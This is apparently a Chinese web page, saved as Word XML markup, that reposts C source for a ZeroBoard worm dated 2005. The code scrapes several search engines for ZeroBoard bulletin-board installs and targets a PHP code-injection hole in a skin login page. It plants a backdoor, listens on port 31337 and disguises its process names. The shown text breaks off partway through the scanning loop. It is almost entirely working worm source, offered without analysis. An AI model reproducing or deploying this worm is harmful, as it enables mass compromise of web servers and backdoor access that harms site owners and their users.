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标题：蠕虫病毒源码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体;SimSun" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ZeroBoard Worm Source Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana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时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体;SimSun" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2005-5-7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="宋体;SimSun"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来源：不详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浏览数：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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="宋体;SimSun"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>次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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">The worm exploits a vulnerability in ZeroBoard, allowing an attacker to inject arbitrary PHP code. </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>/str0ke</w:t>
        <w:br/>
        <w:br/>
        <w:t>*/</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>/*</w:t>
        <w:br/>
        <w:br/>
        <w:t>** ZeroBoard -1day INE w0rm</w:t>
        <w:br/>
        <w:br/>
        <w:t>*/</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;stdio.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;unistd.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;sys/socket.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;netdb.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;netinet/in.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;signal.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;sys/ioctl.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;net/if.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef __sun__</w:t>
        <w:br/>
        <w:br/>
        <w:t>#include &lt;sys/sockio.h&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif /* __SunOS__ */</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:t>#undef DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define TMP_FILE "./tmp.core"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define CMD_FILE "./cmd.core"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define PRC_FILE "./proc.core"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define SCS (0)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define MIN (1)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#ifdef __linux__</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DEF_ETH "eth0"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#else</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef __FreeBSD__</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DEF_ETH "ed0"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#else</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef __sun__</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DEF_ETH "hme0"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define MAX_BUF (0x0000ffff)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FIR_BUF (0x00000800)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define SEC_BUF (0x00000400)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define THR_BUF (0x00000200)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define MIN_BUF (0x00000100)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define VENDOR "nzeo.com"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>// search rule</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_0 "/zboard/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_1 "/zb41/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_2 "/bbs/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_3 "/zb/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_4 "/zb40/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_5 "/board/zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_6 "zboard.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_RULE_7 "zboard.ph"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>// pattern</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_3 "/zb/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_5 "/board/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define FD_PATH_6 "/skin/zero_vote/login.php"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define RESULT_OK "200 OK"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define MAKE_STR2 "ZBCODE MAKE SUCCESS"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DELT_STR1 "BACKDOOR DELETE SUCCESS"</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DELT_STR2 "ZBCODE DELETE SUCCESS"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define DEF_PORT (31337)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define CONN_PORT (80)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define DEF_TIME (20)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>int set_sock(char *sc_gt_host,int port,int type);</w:t>
        <w:br/>
        <w:br/>
        <w:t>void re_connt_lm(int st_sock_va,int type);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int proc_r();</w:t>
        <w:br/>
        <w:br/>
        <w:t>void t_kill();</w:t>
        <w:br/>
        <w:br/>
        <w:t>void sf_exit();</w:t>
        <w:br/>
        <w:br/>
        <w:t>int g_ip(char *ip);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int make_cmd_file();</w:t>
        <w:br/>
        <w:br/>
        <w:t>int filter_f(char *test_bf,int tnum);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>int sock;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>struct tg_rl</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>int r_num;</w:t>
        <w:br/>
        <w:br/>
        <w:t>char *r_str;</w:t>
        <w:br/>
        <w:br/>
        <w:t>char *url_str;</w:t>
        <w:br/>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#define TARGET_NUM (7)</w:t>
        <w:br/>
        <w:br/>
        <w:t>#define SEARCH_NUM (4)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>struct tg_rl __tg_rule_va[]=</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>{0,FD_RULE_0,FD_PATH_0},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{1,FD_RULE_1,FD_PATH_1},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{2,FD_RULE_2,FD_PATH_2},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{3,FD_RULE_3,FD_PATH_3},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{4,FD_RULE_4,FD_PATH_4},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{5,FD_RULE_5,FD_PATH_5},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{6,FD_RULE_6,FD_PATH_6},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{7,FD_RULE_7,FD_PATH_6},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{8,NULL,NULL}</w:t>
        <w:br/>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>struct search_rule</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>int num;</w:t>
        <w:br/>
        <w:br/>
        <w:t>u_char *url;</w:t>
        <w:br/>
        <w:br/>
        <w:t>int maxnum;</w:t>
        <w:br/>
        <w:br/>
        <w:t>int defnum;</w:t>
        <w:br/>
        <w:br/>
        <w:t>u_char *http_head;</w:t>
        <w:br/>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>struct search_rule search_va[]=</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>{0,"www.google.com",990,10,"http://"},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{1,"kr.search.yahoo.com",990,15,"http://"},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{2,"search.nate.com",480,10,"http://"},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{3,"search.lycos.com",990,10,"//"},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{4,"kr.altavista.com",1000,10,"//"},</w:t>
        <w:br/>
        <w:br/>
        <w:t>{5,NULL,0,0,NULL}</w:t>
        <w:br/>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>void t_kill()</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:t>fprintf(stdout,"time out\n");</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>close(sock);</w:t>
        <w:br/>
        <w:br/>
        <w:t>sock=-1;</w:t>
        <w:br/>
        <w:br/>
        <w:t>signal(SIGALRM,SIG_DFL);</w:t>
        <w:br/>
        <w:br/>
        <w:t>return;</w:t>
        <w:br/>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>void sf_exit()</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:t>fprintf(stdout,"safe exit\n");</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>close(sock);</w:t>
        <w:br/>
        <w:br/>
        <w:t>kill((int)proc_r(),9);</w:t>
        <w:br/>
        <w:br/>
        <w:t>unlink(TMP_FILE);</w:t>
        <w:br/>
        <w:br/>
        <w:t>unlink(CMD_FILE);</w:t>
        <w:br/>
        <w:br/>
        <w:t>unlink(PRC_FILE);</w:t>
        <w:br/>
        <w:br/>
        <w:t>exit(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>int main(int argc,char *argv[])</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>FILE *fp;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>int tnum=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int chk=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int gogo=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int whgl=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int qnum=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int tgrl_sl=(MIN);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int _conn_num=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int port=(CONN_PORT);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int def_port=(DEF_PORT);</w:t>
        <w:br/>
        <w:br/>
        <w:t>int sc_gt_sock;</w:t>
        <w:br/>
        <w:br/>
        <w:t>int host_chk=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>u_char *gg_ptr=NULL;</w:t>
        <w:br/>
        <w:br/>
        <w:t>u_char *t_ptr=NULL;</w:t>
        <w:br/>
        <w:br/>
        <w:t>u_char __zr_bf[(MAX_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>u_char *port_ptr=NULL;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>char pkt[(FIR_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char host[(SEC_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char url[(SEC_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char test_bf[(MAX_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char req_t_bf[(THR_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char ip[(MIN_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:t>char atk_code[(MIN_BUF)];</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>signal(SIGINT,sf_exit);</w:t>
        <w:br/>
        <w:br/>
        <w:t>signal(SIGTSTP,sf_exit);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>  extern char *optarg;</w:t>
        <w:br/>
        <w:br/>
        <w:t>  switch(whgl)</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'S':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 's':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    tnum=atoi(optarg);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    if(SEARCH_NUM&lt;tnum)</w:t>
        <w:br/>
        <w:br/>
        <w:t>    {</w:t>
        <w:br/>
        <w:br/>
        <w:t>     fprintf(stderr,"target error\n");</w:t>
        <w:br/>
        <w:br/>
        <w:t>     exit(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    }</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   case 'T':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 't':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    tgrl_sl=atoi(optarg);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    if(TARGET_NUM&lt;tgrl_sl)</w:t>
        <w:br/>
        <w:br/>
        <w:t>    {</w:t>
        <w:br/>
        <w:br/>
        <w:t>     fprintf(stderr,"target error\n");</w:t>
        <w:br/>
        <w:br/>
        <w:t>     exit(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    }</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   case 'Q':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'q':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    qnum=atoi(optarg);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'P':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'p':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    def_port=atoi(optarg);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'H':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'h':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    memset((char *)host,0,sizeof(host));</w:t>
        <w:br/>
        <w:br/>
        <w:t>    strncpy(host,optarg,sizeof(host)-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    host_chk++;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'U':</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 'u':</w:t>
        <w:br/>
        <w:br/>
        <w:t>    memset((char *)url,0,sizeof(url));</w:t>
        <w:br/>
        <w:br/>
        <w:t>    strncpy(url,optarg,sizeof(url)-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    host_chk++;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:br/>
        <w:t>   default:</w:t>
        <w:br/>
        <w:br/>
        <w:t>    exit(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>  }</w:t>
        <w:br/>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>(int)make_cmd_file();</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>if(fork()==0)</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>  signal(SIGALRM,SIG_IGN);</w:t>
        <w:br/>
        <w:br/>
        <w:t>  for(whgl=0;whgl&lt;argc;whgl++)</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>   memset((char *)argv[whgl],0,strlen(argv[whgl]));</w:t>
        <w:br/>
        <w:br/>
        <w:t>  }</w:t>
        <w:br/>
        <w:br/>
        <w:t>  strcpy(argv[0],"receive mode process");</w:t>
        <w:br/>
        <w:br/>
        <w:t>  if((fp=fopen(PRC_FILE,"w"))==NULL)</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>   sf_exit();</w:t>
        <w:br/>
        <w:br/>
        <w:t>  }</w:t>
        <w:br/>
        <w:br/>
        <w:t>  fprintf(fp,"%d\n",getpid());</w:t>
        <w:br/>
        <w:br/>
        <w:t>  fclose(fp);</w:t>
        <w:br/>
        <w:br/>
        <w:t>  sc_gt_sock=(int)set_sock(NULL,def_port,1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>  (void)re_connt_lm(sc_gt_sock,0);</w:t>
        <w:br/>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>else</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:br/>
        <w:t>  for(whgl=0;whgl&lt;argc;whgl++)</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>   memset((char *)argv[whgl],0,strlen(argv[whgl]));</w:t>
        <w:br/>
        <w:br/>
        <w:t>  }</w:t>
        <w:br/>
        <w:br/>
        <w:t>  strcpy(argv[0],"scanning mode process");</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>  switch(host_chk)</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 1:</w:t>
        <w:br/>
        <w:br/>
        <w:t>#ifdef DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:t>    fprintf(stdout,"argument error\n");</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>    sf_exit();</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
        <w:br/>
        <w:br/>
        <w:t>   case 2:</w:t>
        <w:br/>
        <w:br/>
        <w:t>    goto ok;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>  }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>#ifdef DEBUG_ING</w:t>
        <w:br/>
        <w:br/>
        <w:t>  fprintf(stdout,"search url: %s\n",search_va[tnum].url);</w:t>
        <w:br/>
        <w:br/>
        <w:t>#endif</w:t>
        <w:br/>
        <w:br/>
        <w:t>  for(_conn_num=qnum; _conn_num&lt; search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))</w:t>
        <w:br/>
        <w:br/>
        <w:t>  {</w:t>
        <w:br/>
        <w:br/>
        <w:t>conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    goto conn;</w:t>
        <w:br/>
        <w:br/>
        <w:t>   }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   memset((char *)req_t_bf,0,sizeof(req_t_bf));</w:t>
        <w:br/>
        <w:br/>
        <w:t>   switch(search_va[tnum].num)</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    case 0:</w:t>
        <w:br/>
        <w:br/>
        <w:t>     snprintf(req_t_bf,sizeof(req_t_bf)-1,</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "GET /search?q=%s"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "&amp;hl=ko&amp;lr=&amp;ie=UTF-8&amp;start=%d&amp;sa=N "</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    case 1:</w:t>
        <w:br/>
        <w:br/>
        <w:t>     snprintf(req_t_bf,sizeof(req_t_bf)-1,</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "GET /search/web?p=%s&amp;b=%d "</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    case 2:</w:t>
        <w:br/>
        <w:br/>
        <w:t>     snprintf(req_t_bf,sizeof(req_t_bf)-1,</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "GET /webpage/search.asp?query=%s&amp;start=%d "</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    case 3:</w:t>
        <w:br/>
        <w:br/>
        <w:t>     snprintf(req_t_bf,sizeof(req_t_bf)-1,</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "GET /default.asp?query=%s&amp;first=%d&amp;pmore=more "</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "HTTP/1.0\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "Accept-Language: ko\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>    case 4:</w:t>
        <w:br/>
        <w:br/>
        <w:t>     snprintf(req_t_bf,sizeof(req_t_bf)-1,</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "GET /web/results?itag=wrx&amp;q=%s&amp;stq=%d "</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "HTTP/1.0\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "Accept-Language: ko\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"</w:t>
        <w:br/>
        <w:br/>
        <w:t>      "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     break;</w:t>
        <w:br/>
        <w:br/>
        <w:t>   }</w:t>
        <w:br/>
        <w:br/>
        <w:t>   send(sock,req_t_bf,strlen(req_t_bf),0);</w:t>
        <w:br/>
        <w:br/>
        <w:t>   whgl=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   if((fp=fopen(TMP_FILE,"w"))==NULL)</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    return(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>   }</w:t>
        <w:br/>
        <w:br/>
        <w:t>   signal(SIGALRM,SIG_IGN);</w:t>
        <w:br/>
        <w:br/>
        <w:t>   alarm(MAX_BUF);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
        <w:br/>
        <w:br/>
        <w:t>   memset((char *)test_bf,0,sizeof(test_bf));</w:t>
        <w:br/>
        <w:br/>
        <w:t>   while(recv(sock,test_bf,sizeof(test_bf)-1,0))</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    fprintf(fp,"%s",test_bf);</w:t>
        <w:br/>
        <w:br/>
        <w:t>    memset((char *)test_bf,0,sizeof(test_bf));</w:t>
        <w:br/>
        <w:br/>
        <w:t>   }</w:t>
        <w:br/>
        <w:br/>
        <w:t>   fclose(fp);</w:t>
        <w:br/>
        <w:br/>
        <w:t>   close(sock);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   if((fp=fopen(TMP_FILE,"r"))==NULL)</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    return(-1);</w:t>
        <w:br/>
        <w:br/>
        <w:t>   }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>   while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))</w:t>
        <w:br/>
        <w:br/>
        <w:t>   {</w:t>
        <w:br/>
        <w:br/>
        <w:t>    gg_ptr=__zr_bf;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>    while(MIN)</w:t>
        <w:br/>
        <w:br/>
        <w:t>    {</w:t>
        <w:br/>
        <w:br/>
        <w:t>     t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);</w:t>
        <w:br/>
        <w:br/>
        <w:t>     gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>     if(t_ptr!=NULL)</w:t>
        <w:br/>
        <w:br/>
        <w:t>     {</w:t>
        <w:br/>
        <w:br/>
        <w:t>      memset((char *)test_bf,0,sizeof(test_bf));</w:t>
        <w:br/>
        <w:br/>
        <w:t>      whgl=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:t>      chk=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
